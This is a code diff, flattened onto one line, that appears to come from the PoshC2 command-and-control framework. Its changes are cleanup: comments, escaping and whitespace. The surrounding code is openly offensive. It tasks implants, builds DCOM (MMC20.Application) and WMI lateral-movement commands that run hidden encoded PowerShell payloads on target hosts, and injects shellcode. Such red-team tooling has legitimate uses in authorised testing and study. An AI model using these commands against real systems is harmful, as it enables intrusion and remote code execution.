diff --git a/C2Server.py b/C2Server.py index 7fc8a69..d4fb38a 100644 --- a/C2Server.py +++ b/C2Server.py @@ -50,11 +50,8 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): QuickCommandURI = select_item("QuickCommand", "C2Server") s.server_version = ServerHeader s.sys_version = "" - if s.cookieHeader: - r = "" - else: + if not s.cookieHeader: s.cookieHeader = "NONE" - # class Tasks() # implant gets a new task new_task = newTask(s.path) @@ -139,7 +136,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): s.send_header("Content-type", "application/x-msdownload") s.end_headers() s.wfile.write(content) - # class Implant() # register new implant elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"): implant_type = "Normal" @@ -264,7 +260,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): print ("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S"))) else: print ("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S"))) - #print decCookie,Colours.END outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput) outputParsed = outputParsed.rstrip() @@ -283,7 +278,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): except Exception as e: update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!") print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!") - # What should this be now? elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")): update_task(taskId, "Upload shellcode complete") print ("Upload shellcode complete") @@ -360,9 +354,9 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): print (Colours.GREEN) print (outputParsed + Colours.END) except Exception as e: - e = "" # print e # traceback.print_exc() + pass finally: s.send_response(200) @@ -384,7 +378,6 @@ if __name__ == '__main__': print (Colours.GREEN + logopic) print (Colours.END + "") - # KeyFile = None, CertFile = None, ClientCertCAs = None if os.path.isfile(Database): print ("Using existing database / project" + Colours.GREEN) C2 = get_c2server_all() @@ -481,7 +474,6 @@ if __name__ == '__main__': httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1) else: raise ValueError("Cannot find the certificate files") - #logging.basicConfig(level=logging.WARNING) # DEBUG,INFO,WARNING,ERROR,CRITICAL try: httpd.serve_forever() diff --git a/ImplantHandler.py b/ImplantHandler.py index c1b0b20..93e890a 100644 --- a/ImplantHandler.py +++ b/ImplantHandler.py @@ -148,7 +148,7 @@ def startup(user, printhelp = ""): except Exception as e: print ("cls") print (chr(27) + "[2J") - print (Colours.GREEN + "") + print (Colours.GREEN) print (logopic) print ("") diff --git a/PSHandler.py b/PSHandler.py index dd7a7a0..45b2f71 100644 --- a/PSHandler.py +++ b/PSHandler.py @@ -181,7 +181,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre new_task(cmd, user, randomuri) # wmi lateral movement - elif "invoke-wmiproxypayload" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))): @@ -218,7 +217,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre new_task(cmd, user, randomuri) # dcom lateral movement - elif "invoke-dcomproxypayload" in command.lower(): if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read() @@ -226,7 +224,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre params = params.sub("", command) p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() - pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload) + pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createproxypayload first") @@ -237,7 +235,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() - pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) + pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createdaisypayload first") @@ -250,11 +248,10 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre payload = newPayload.CreateRawBase() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() - pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) + pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) new_task(pscommand, user, randomuri) # runas payloads - elif "invoke-runasdaisypayload" in command.lower(): daisyname = raw_input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): diff --git a/SharpHandler.py b/SharpHandler.py index 9829bab..9f2b839 100644 --- a/SharpHandler.py +++ b/SharpHandler.py @@ -15,7 +15,7 @@ def handle_sharp_command(command, user, randomuri, startup): except Exception as e: print ("Error loading Stage2-Core.exe: %s" % e) - # alias mapping + # alias mapping for alias in cs_alias: if alias[0] == command.lower()[:len(command.rstrip())]: command = alias[1] @@ -75,7 +75,6 @@ def handle_sharp_command(command, user, randomuri, startup): try: shellcodefile = load_file(path) if shellcodefile != None: - arch = "64" new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri) except Exception as e: print ("Error loading file: %s" % e)